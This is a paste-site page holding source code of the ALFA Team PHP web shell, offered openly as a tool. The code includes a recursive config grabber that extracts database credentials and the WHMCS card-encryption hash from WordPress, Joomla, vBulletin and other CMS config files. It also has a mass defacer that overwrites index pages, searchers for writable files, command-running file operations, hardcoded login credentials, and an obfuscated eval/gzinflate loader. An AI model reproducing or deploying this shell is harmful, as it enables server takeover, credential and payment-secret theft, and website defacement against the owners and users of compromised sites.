\".$icon.\"\".$file[\"name\"].\"\".alfaSize($file[\"size\"]).\"\".$file[\"modify\"].\"-
';\n\t}catch(Exception $e){\n\t\techo(\"0\");\n\t}\n}\nfunction alfaopen_archive_dir(){\n\t$dir = $_POST[\"alfa1\"];\n\t$base_id = $_POST[\"alfa2\"];\n\t__alfa_open_archive_file($dir, $base_id);\n}\nfunction alfaconfig_grabber(){\n\talfahead();\n\techo '
| Config Grabber |
';\n\techo '
>\\');return false;\" method=\\'post\\'>\n\t
\n\tDir: \n\tExt: [ * = all Ext ] \n\t

';\n\t$dir = $_POST['alfa2'];\n\t$ext = $_POST['alfa3'];\n\tif($_POST['alfa5']=='>>'){\n\t\techo __pre();\n\t\tAlfa_ConfigGrabber($dir, $ext);\n\t}\n\techo '
';\n\talfafooter();\n}\nfunction Alfa_ConfigGrabber($dir, $ext) {\n\t$pattern = \"#define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_HOST(?:'|\\\")[ ]{0,}|define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_HOSTNAME(?:'|\\\")[ ]{0,}|config\\[(?:'|\\\")MasterServer(?:'|\\\")\\]\\[(?:'|\\\")password(?:'|\\\")\\]|(?:'|\\\")database(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")|(?:'|\\\")(mysql|database)(?:'|\\\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i\";\n\t$db_files = array(\"wp-config.php\",\"configure.php\",\"config.inc.php\",\"configuration.php\",\"config.php\",\"conf.php\",\"dbclass.php\",\"class_core.php\",\"dist-configure.php\", \"settings.php\", \"conf_global.php\", \"db.php\", \"connect.php\", \"confing.db.php\", \"config.db.php\", \"database.php\");\n\tif(@is_readable($dir)){\n\t\t$globFiles = @glob(\"$dir/*.$ext\");\n\t\t$globDirs  = @glob(\"$dir/*\", GLOB_ONLYDIR);\n\t\t$blacklist = array();\n\t\tforeach ($globDirs as $dir) {\n\t\t\tif(!@is_readable($dir)||@is_link($dir)) continue;\n\t\t\t@Alfa_ConfigGrabber($dir, $ext);\n\t\t}\n\t\tforeach ($globFiles as $file){\n\t\t\t$filee = @file_get_contents($file);\n\t\t\tif(preg_match($pattern, $filee)){\n\t\t\t\techo \"\";\n\t\t\t}\n\t\t}\n\t}\n}\nfunction alfasearcher(){\nalfahead();\necho '
| Searcher |
| Find Readable Or Writable Files | | Find Files By Name | 
';\nif(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){\necho '
| Find Readable Or Writable Files  |


>\\');return false;\" method=\\'post\\'>\n
\nMethod: \nDir: \nExt: [ * = all Ext ] \n

';\n$dir = $_POST['alfa2'];\n$ext = $_POST['alfa3'];\n$method = $_POST['alfa4'];\nif($_POST['alfa5']=='>>'){\necho __pre();\nif(substr($dir,-1)=='/')$dir=substr($dir,0,-1);\nAlfa_Searcher($dir,trim($ext),$method);\n}\n}\nif($_POST['alfa1']=='str'){\necho '
| Find Files By Name / Find String In Files |


>\\',this.ext.value,this.method.value);return false;\" method=\\'post\\'>\n
\nMethod: \nString: \nDir: \nExt: [ * = all Ext ] \n

';\n$dir = $_POST['alfa2'];\n$string = $_POST['alfa3'];\n$ext = $_POST['alfa5'];\nif(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){\necho __pre();\nAlfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);\n}\n}\necho '
';\nalfafooter();\n}\nfunction alfaMassDefacer(){\nalfahead();\nAlfaNum(5,6,7,8,9,10);\necho \"
| Mass Defacer |
>');return false;\\\" method='post'>\";\necho '
Deface Method: \n\tMass dir: \n\tDefPage: 
 
\n';\n$dir = $_POST['alfa1'];\n$defpage = $_POST['alfa2'];\n$method = $_POST['alfa3'];\n$fCurrent = $GLOBALS['__file_path'];\nif($_POST['alfa4'] == '>>'){\nif(!empty($dir)){\nif(@is_dir($dir)){\nif(@is_readable($dir)){\nif(@is_file($defpage)){\nif($dh = @opendir($dir)){\necho __pre();\nwhile (($file = @readdir($dh)) !== false){\nif($file == '..' || $file == '.')continue;\n$newfile=$dir.$file;\nif($fCurrent == $newfile)continue;\nif(@is_dir($newfile)){\nAlfa_ReadDir($newfile,$method,$defpage);\n}else{\nif(!@is_writable($newfile))continue;\nif(!@is_readable($newfile))continue;\nAlfa_Rewriter($newfile,$file,$defpage,$method);\n}\n}\nclosedir($dh);\n}else{__alert('Error In OpenDir...');}\n}else{__alert('DefPage File NotFound...');}\n}else{__alert('Directory is not Readable...');}\n}else{__alert('Mass Dir is Invalid Dir...');}\n}else{__alert('Dir is Empty...');}\n}\necho '
';\nalfafooter();\n}\nfunction Alfa_ReadDir($dir,$method='',$defpage=''){\nif(!@is_readable($dir)) return false;\nif (@is_dir($dir)) {\nif ($dh = @opendir($dir)) {\nwhile(($file=readdir($dh))!==false) {\nif($file == '..' || $file == '.')continue;\n$newfile=$dir.'/'.$file;\nif(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);\nif(@is_file($newfile)){\nif(!@is_readable($newfile))continue;\nAlfa_Rewriter($newfile,$file,$defpage,$method);\n}\n}\nclosedir($dh);\n}\n}\n}\nfunction Alfa_Rewriter($dir,$file,$defpage,$m='index'){\nif(!@is_writable($dir)) return false;\nif(!@is_readable($dir)) return false;\n$defpage=@file_get_contents($defpage);\nif($m == 'index'){\n$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');\nif(in_array(strtolower($file),$indexs)){\n@file_put_contents($dir,$defpage);\necho @is_file($dir)?$dir.\"DeFaced...
\" : '';\n}\n}elseif($m=='all'){\n@file_put_contents($dir,$defpage);\necho @is_file($dir)?$dir.\"  DeFaced...
\" : '';\n}\n}\nfunction alfaGetDisFunc(){\nalfahead();\necho '
';\n$disfun = @ini_get('disable_functions');\n$s = explode(',',$disfun);\n$f = array_unique($s);\necho '

Disable Functions
';\n$i=1;\nforeach($f as $s){\n$s=trim($s);\nif(function_exists($s)||!is_callable($s))continue;\necho '';\necho '';\n$i++;\n}\necho '
#Func Name
'.$i.''.$s.'
';\necho '
';\nalfafooter();\n}\nfunction Alfa_Create_A_Tag($action,$vals){\n$nulls = array();\nforeach($vals as $key => $val){\necho '| '.$key.' | ';\nunset($nulls);\n}\n}\nfunction Alfa_Searcher($dir, $ext, $method) {\nif(@is_readable($dir)){\nif($method == 'all')$ext = '*';\nif($method == 'dirs')$ext = '*';\n$globFiles = @glob(\"$dir/*.$ext\");\n$globDirs  = @glob(\"$dir/*\", GLOB_ONLYDIR);\n$blacklist = array();\nforeach ($globDirs as $dir) {\nif(!@is_readable($dir)||@is_link($dir)) continue;\n@Alfa_Searcher($dir, $ext, $method);\n}\nswitch($method){\ncase \"files\":\nforeach ($globFiles as $file){\nif(@is_writable($file)){\necho \"$file
\";\n}\n}\nbreak;\ncase \"dirs\":\nforeach ($globFiles as $file){\nif(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){\necho dirname($file).'
';\n$blacklist[] = dirname($file);\n}\n}\nbreak;\ncase \"all\":\nforeach ($globFiles as $file){\necho $file.'
';\n}\nbreak;\n}\nunset($blacklist);\n}\n}\nfunction AlfaiFrameCreator($f,$width='100%',$height='600px'){\nreturn('');\n}\nclass AlfaCURL {\npublic $headers;\npublic $user_agent;\npublic $compression;\npublic $cookie_file;\npublic $proxy;\npublic $path;\npublic $ssl = true;\npublic $curl_status = true;\nfunction __construct($cookies=false,$compression='gzip',$proxy=''){\nif(!extension_loaded('curl')){$curl_status = false;return false;}\n$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';\n$this->headers[] = 'Connection: Keep-Alive';\n$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';\n$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';\n$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';\n$this->compression=$compression;\n$this->proxy=$proxy;\n$this->cookies=$cookies;\nif($this->cookies)$this->cookie($this->path);\n}\nfunction cookie($cookie_file) {\nif (_alfa_file_exists($cookie_file,false)) {\n$this->cookie_file=$cookie_file;\n}else{\n@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));\n$this->cookie_file=$cookie_file;\n@fclose($this->cookie_file);\n}\n}\nfunction Send($url,$method=\"get\",$data=\"\"){\nif(!$this->curl_status){return false;}\n$process = curl_init($url);\ncurl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);\ncurl_setopt($process, CURLOPT_HEADER, 0);\ncurl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);\ncurl_setopt($process, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($process, CURLOPT_ENCODING , $this->compression);\ncurl_setopt($process, CURLOPT_TIMEOUT, 30);\nif($this->ssl){\ncurl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);\ncurl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);\n}\nif($this->cookies){\ncurl_setopt($process, CURLOPT_COOKIEFILE, $this->path);\ncurl_setopt($process, CURLOPT_COOKIEJAR, $this->path);\n}\nif($this->proxy){\ncurl_setopt($process, CURLOPT_PROXY, $this->proxy);\n}\nif($method=='post'){\ncurl_setopt($process, CURLOPT_POSTFIELDS, $data);\ncurl_setopt($process, CURLOPT_POST, 1);\ncurl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));\n}\n$return = @curl_exec($process);\ncurl_close($process);\nreturn $return;\n}\nfunction error($error) {\necho \"
cURL Error
$error
\";\ndie;\n}\n}\nfunction getConfigHtml($cms){\n$content = '';\n$cms_array = array(\"wp\" => \"WordPress\", \"vb\" => \"vBulletin\", \"whmcs\" => \"Whmcs\", \"joomla\" => \"Joomla\", \"phpnuke\" => \"PHPNuke\",\"phpbb\"=>\"PHPBB\",\"mybb\"=>\"MyBB\",\"drupal\"=>\"Drupal\",\"smf\"=>\"SMF\");\n$content .= \"
Cms: 
  
Path(installed cms/Config): 
  \";\n$content .= \"
\";\nreturn $content;\n}\nif (!function_exists('json_encode')){\n    function json_encode($a=false){\n        if (is_null($a)) return 'null';\n        if ($a === false) return 'false';\n        if ($a === true) return 'true';\n        if (is_scalar($a))\n        {\n            if (is_float($a))\n            {\n                return floatval(str_replace(\",\", \".\", strval($a)));\n            }\n\n            if (is_string($a))\n            {\n                static $jsonReplaces = array(array(\"\\\\\", \"/\", \"\\n\", \"\\t\", \"\\r\", \"\\b\", \"\\f\", '\"'), array('\\\\\\\\', '\\\\/', '\\\\n', '\\\\t', '\\\\r', '\\\\b', '\\\\f', '\\\"'));\n                return '\"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '\"';\n            }\n            else\n            return $a;\n        }\n        $isList = true;\n        for ($i = 0, reset($a); $i < count($a); $i++, next($a))\n        {\n            if (key($a) !== $i)\n            {\n                $isList = false;\n                break;\n            }\n        }\n        $result = array();\n        if ($isList)\n        {\n            foreach ($a as $v) $result[] = json_encode($v);\n            return '[' . join(',', $result) . ']';\n        }\n        else\n        {\n            foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);\n            return '{' . join(',', $result) . '}';\n        }\n    }\n}\nif ( !function_exists('json_decode') ){\nfunction json_decode($json, $array=true){\n    $comment = false;\n    $out = '$x=';\n    for ($i=0; $i convertBash($out), \"path\" => $current_path));\n}\nfunction convertBash($code) {\n    $dictionary = array(\n        '[01;30m' => '',\n        '[01;31m' => '',\n        '[01;32m' => '',\n        '[01;33m' => '',\n        '[01;34m' => '',\n        '[01;35m' => '',\n        '[01;36m' => '',\n        '[01;37m' => '',\n        '[0m'   => ''\n    );\n    $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);\n    return $htmlString;\n}\nfunction alfadoActions(){\n\t$chdir_fals = false;\n\tif(!@chdir($_POST['c'])){\n\t\t$chdir_fals = true;\n\t\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\n\t}\n\tif(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);\n\tif(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);\n\t$action = $_POST[\"alfa3\"];\n\tif($action == \"permission\"){\n\t\t$perms = 0;\n\t\t$perm = $_POST[\"alfa2\"];\n\t\tfor($i=strlen($perm)-1;$i>=0;--$i){\n\t\t\t$perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));\n\t\t}\n\t\tif(@chmod($_POST['alfa1'], $perms)){\n\t\t\techo(\"done\");\n\t\t}else{\n\t\t\techo(\"no\");\n\t\t}\n\t\treturn;\n\t}\n\tif($action == \"rename\" || $action == \"move\"){\n\t\t$alfa1_decoded = $_POST['alfa1'];\n\t\tif($chdir_fals){\n\t\t\t$_POST['alfa1'] = $_POST[\"c\"].\"/\".$_POST[\"alfa1\"];\n\t\t}\n\t\t$_POST['alfa1'] = trim($_POST['alfa1']);\n\t\t$alfa1_escape = addslashes($_POST[\"alfa1\"]);\n\t\tif($_POST[\"alfa3\"] == \"rename\"){\n\t\t\t$_POST['alfa2'] = basename($_POST['alfa2']);\n\t\t}\n\t\tif(!empty($_POST['alfa2'])){\n\t\t\t$cmd_rename = false;\n\t\t\tif($chdir_fals&&$alfa_canruncmd){\n\t\t\t\tif(_alfa_is_writable($_POST['alfa1'])){\n\t\t\t\t\t$cmd_rename = true;\n\t\t\t\t\t$alfa1_escape = addslashes($alfa1_decoded);\n\t\t\t\t\talfaEx(\"cd '\".addslashes($_POST['c']).\"';mv '\".$alfa1_escape.\"' '\".addslashes($_POST['alfa2']).\"'\");\n\t\t\t\t}\n\t\t\t}\n\t\t\tif(!file_exists($_POST['alfa2'])){\n\t\t\t\tif(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){\n\t\t\t\t\techo \"done\";\n\t\t\t\t}else{\n\t\t\t\t\techo \"no\";\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\techo \"no\";\n\t\t\t}\n\t\t}\n\t}elseif($action == \"copy\"){\n\t\tif(is_dir($_POST[\"alfa1\"])){\n\t\t\t$dir = str_replace('//', '/', $_POST[\"alfa1\"]);\n\t\t\t$dir = explode('/', $dir);\n\t\t\tif(empty($dir[count($dir) - 1])){\n\t\t\t\t$name = $dir[count($dir) - 2];\n\t\t\t}else{\n\t\t\t\t$name = $dir[count($dir) - 1];\n\t\t\t}\n\t\t}else{\n\t\t\t$name = basename($_POST[\"alfa1\"]);\n\t\t}\n\t\t$dir = dirname($_POST[\"alfa1\"]);\n\t\tif($dir == \".\"){\n\t\t\t$dir = $_POST[\"c\"].\"/\";\n\t\t}\n\t\tif(is_file($_POST[\"alfa1\"])){\n\t\t\t@copy($_POST[\"alfa1\"], $_POST[\"alfa2\"]);\n\t\t\techo(\"done\");\n\t\t}elseif(is_dir($_POST[\"alfa1\"])){\n\t\t\tif(!is_dir($_POST[\"alfa2\"])){\n\t\t\t\tmkdir($_POST[\"alfa2\"], 0755, true);\n\t\t\t}\n\t\t\tcopy_paste($dir, $name , $_POST[\"alfa2\"] . \"/\");\n\t\t\techo(\"done\");\n\t\t}\n\t}elseif($action == \"modify\"){\n\t\tif( !empty($_POST['alfa1']) ) {\n\t\t\t$time = strtotime($_POST['alfa1']);\n\t\t\tif($time){\n\t\t\t\t$touched = false;\n\t\t\t\tif($chdir_fals&&$alfa_canruncmd){\n\t\t\t\t\talfaEx(\"cd '\".addslashes($_POST[\"c\"]).\"';touch -d '\".htmlspecialchars(addslashes($_POST['alfa1'])).\"' '\".addslashes($_POST['alfa2']).\"'\");\n\t\t\t\t\t$touched = true;\n\t\t\t\t}\n\t\t\t\tif(!@touch($_POST['alfa2'],$time,$time)&&!$touched){\n\t\t\t\t\techo 'no';\n\t\t\t\t}else{\n\t\t\t\t\techo 'ok';\n\t\t\t\t}\n\t\t\t} else{\n\t\t\t\t echo 'badtime';\n\t\t\t}\n\t\t}\n\t}\n\n}\nfunction alfaget_flags(){\n\t$flags = array();\n\tif(function_exists(\"curl_version\")){\n\t\t$curl = new AlfaCURL();\n\t\t$server_addr = (!@$_SERVER[\"SERVER_ADDR\"]?(function_exists(\"gethostbyname\")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER[\"SERVER_ADDR\"]);\n\t\t$flag = $curl->Send(\"http://www.geoplugin.net/json.gp?ip=\" . $server_addr);\n\t\t$flag2 = $curl->Send(\"http://www.geoplugin.net/json.gp?ip=\" . $_SERVER[\"REMOTE_ADDR\"]);\n\t\tif(strpos($flag2, \"geoplugin\") != false){\n\t\t\t$flag = json_decode($flag, true);\n\t\t\t$flag2 = json_decode($flag2, true);\n\t\t\tif(!empty($flag['geoplugin_countryCode'])){\n\t\t\t\t$flags[\"server\"][\"name\"] = $flag['geoplugin_countryName'];\n\t\t\t\t$flags[\"server\"][\"code\"] = $flag['geoplugin_countryCode'];\n\t\t\t}\n\t\t\tif(!empty($flag2['geoplugin_countryCode'])){\n\t\t\t\t$flags[\"client\"][\"name\"] = $flag2['geoplugin_countryName'];\n\t\t\t\t$flags[\"client\"][\"code\"] = $flag2['geoplugin_countryCode'];\n\t\t\t}\n\t\t}\n\t}\n\techo json_encode($flags);\n}\nfunction alfaGetConfig(){\n$cms = $_POST['alfa1'];\n$path = trim($_POST['alfa2']);\n$config = array(\n'wp'=>array('file'=>'/wp-config.php',\n'host'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_HOST(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbname'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_NAME(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbuser'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_USER(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbpw'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_PASSWORD(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'prefix'=>array(\"/table_prefix[ ]{0,}=[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",1)\n),\n'drupal'=>array('file'=>'/config.php',\n'host'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_HOSTNAME(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbname'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_DATABASE(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbuser'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_USERNAME(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'dbpw'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_PASSWORD(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1),\n'prefix'=>array(\"/define[ ]{0,}\\([ ]{0,}(?:'|\\\")DB_PREFIX(?:'|\\\")[ ]{0,},[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,}\\)[ ]{0,};/\",1)\n),\n'drupal2'=>array('file'=>'/sites/default/settings.php',\n'host'=>array(\"/(?:'|\\\")host(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,},/\",1),\n'dbname'=>array(\"/(?:'|\\\")database(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,},/\",1),\n'dbuser'=>array(\"/(?:'|\\\")username(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,},/\",1),\n'dbpw'=>array(\"/(?:'|\\\")password(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,},/\",1),\n'prefix'=>array(\"/(?:'|\\\")prefix(?:'|\\\")[ ]{0,}=>[ ]{0,}(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,},/\",1)\n),\n'vb'=>array('file'=>'/includes/config.php',\n'host'=>array(\"/config\\[(?:'|\\\")MasterServer(?:'|\\\")\\]\\[(?:'|\\\")servername(?:'|\\\")\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",3),\n'dbuser'=>array(\"/config\\[(?:'|\\\")MasterServer(?:'|\\\")\\]\\[(?:'|\\\")username(?:'|\\\")\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",3),\n'dbname'=>array(\"/config\\[(?:'|\\\")Database(?:'|\\\")\\]\\[(?:'|\\\")dbname(?:'|\\\")\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",3),\n'dbpw'=>array(\"/config\\[(?:'|\\\")MasterServer(?:'|\\\")\\]\\[(?:'|\\\")password(?:'|\\\")\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",3),\n'prefix'=>array(\"/config\\[(?:'|\\\")Database(?:'|\\\")\\]\\[(?:'|\\\")tableprefix(?:'|\\\")\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\")[ ]{0,};/\",3)\n),\n'phpnuke'=>array('file'=>'/config.php',\n'host'=>array('/dbhost(\\s+)=(\\s+)(?:\\'|\")(.*?)(?:\\'|\");/',3),\n'dbname'=>array('/dbname(\\s+)=(\\s+)(?:\\'|\")(.*?)(?:\\'|\");/',3),\n'dbuser'=>array('/dbuname(\\s+)=(\\s+)(?:\\'|\")(.*?)(?:\\'|\");/',3),\n'dbpw'=>array('/dbpass(\\s+)=(\\s+)(?:\\'|\")(.*?)(?:\\'|\");/',3),\n'prefix'=>array('/prefix(\\s+)=(\\s+)(?:\\'|\")(.*?)(?:\\'|\");/',3)\n),\n'smf'=>array('file'=>'/Settings.php',\n'host'=>array(\"/db_server(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbname'=>array(\"/db_name(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbuser'=>array(\"/db_user(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbpw'=>array(\"/db_passwd(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'prefix'=>array(\"/db_prefix(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3)\n),\n'whmcs'=>array('file'=>'/configuration.php',\n'host'=>array(\"/db_host(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbname'=>array(\"/db_name(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbuser'=>array(\"/db_username(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbpw'=>array(\"/db_password(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'cc_encryption_hash'=>array(\"/cc_encryption_hash(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3)\n),\n'joomla'=>array('file'=>'/configuration.php',\n'host'=>array(\"/\\\\\\$host(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbname'=>array(\"/\\\\\\$db(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbuser'=>array(\"/\\\\\\$user(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbpw'=>array(\"/\\\\\\$password(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'prefix'=>array(\"/\\\\\\$dbprefix(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3)\n),\n'phpbb'=>array('file'=>'/config.php',\n'host'=>array(\"/dbhost(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbname'=>array(\"/dbname(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbuser'=>array(\"/dbuser(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbpw'=>array(\"/dbpasswd(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'prefix'=>array(\"/table_prefix(\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3)\n),\n'mybb'=>array('file'=>'/inc/config.php',\n'host'=>array(\"/config\\['database'\\]\\['hostname'\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbname'=>array(\"/config\\['database'\\]\\['database'\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbuser'=>array(\"/config\\['database'\\]\\['username'\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'dbpw'=>array(\"/config\\['database'\\]\\['password'\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3),\n'prefix'=>array(\"/config\\['database'\\]\\['table_prefix'\\](\\s+)=(\\s+)(?:'|\\\")(.*?)(?:'|\\\");/\",3)\n)\n);\nif($cms == \"drupal\"){\n\t$file = $config[$cms]['file'];\n\t$file=$path.$file;\n\tif(@is_file($file)||_alfa_is_dir($file,\"-e\")){\n\t}else{\n\t\t$cms = 'drupal2';\n\t}\n}\nif($cms == \"vb\"){\n\t$file = $config[$cms]['file'];\n\t$file=$path.$file;\n\tif(@is_file($file)||_alfa_is_dir($file,\"-e\")){\n\t}else{\n\t\t$path .= '/core';\n\t}\n}\n$data = array();\n$srch_host = $config[$cms]['host'][0];\n$srch_user = $config[$cms]['dbuser'][0];\n$srch_name = $config[$cms]['dbname'][0];\n$srch_pw = $config[$cms]['dbpw'][0];\n$prefix = $config[$cms]['prefix'][0];\n$file = $config[$cms]['file'];\n$chost = $config[$cms]['host'][1];\n$cuser = $config[$cms]['dbuser'][1];\n$cname = $config[$cms]['dbname'][1];\n$cpw = $config[$cms]['dbpw'][1];\n$cprefix = $config[$cms]['prefix'][1];\nif(@is_dir($path)||_alfa_is_dir($path)){\n$file=$path.$file;\n}elseif(@is_file($path)||_alfa_is_dir($path,\"-e\")){\n$file=$path;\n}else{\nreturn false;\n}\n$file = __read_file($file);\nif($cms == \"drupal2\"){\n\t$file = preg_replace(\"/\\@code(.*?)\\@endcode/s\", \"\", $file);\n}elseif($cms == \"vb\"){\n\t$file = preg_replace(\"/right of the(.*?)BAD!/s\", \"\", $file);\n}\nif(preg_match($srch_host, $file, $mach)){\n$data['host'] = $mach[$chost];\n}\nif(preg_match($srch_user, $file, $mach)){\n$data['user'] = $mach[$cuser];\n}\nif(preg_match($srch_name, $file, $mach)){\n$data['dbname'] = $mach[$cname];\n}\nif(preg_match($srch_pw, $file, $mach)){\n$data['password'] = $mach[$cpw];\n}\nif(isset($prefix)){\nif(preg_match($prefix, $file, $mach)){\n$data['prefix'] = $mach[$cprefix];\n}\n}\nif($cms=='whmcs'){\nif(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){\n$data['cc_encryption_hash'] = $mach[3];\n}\n}\necho json_encode($data);\n}\nif(empty($_POST['a']))\nif(isset($default_action) && function_exists('alfa' . $default_action))\n$_POST['a'] = $default_action;\nelse\n$_POST['a'] = 'FilesMan2';//'FilesMan';\nif(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))\ncall_user_func('alfa' . $_POST['a']);\nexit;\n/*\n#Persian Gulf For Ever\n#skype : sole.sad\n#skype : ehsan.invisible\n*/\n?>"}
Paste
Author:
Anonymousrfznnlicon
| Size: 446.54 KB
|
<?php
/*
	Author: 	Solevisible/Alfa-Team
	Telegram: 	https://telegram.me/solevisible
	YouTube: 	https://youtube.com/solevisible
	Gmail:		[email protected]
	Date:		Monday, September 14, 2020
*/
$GLOBALS['oZgNypoPRU'] = array(
    'username' => 'alfa',
    'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan)
    'safe_mode' => '0',
    'login_page' => '403',
    'show_icons' => '1',
    'post_encryption' => false,
    'cgi_api' => true,
);

$CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
$aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
$OVpGNqqFZs = 'e' . 'v' . 'al';
$psDEwGhsxg = 'gz' . 'inf' . 'late';

if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''))
{
    function vcnvSCZgBz($data)
    {
        if (empty($data)) return;
        $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
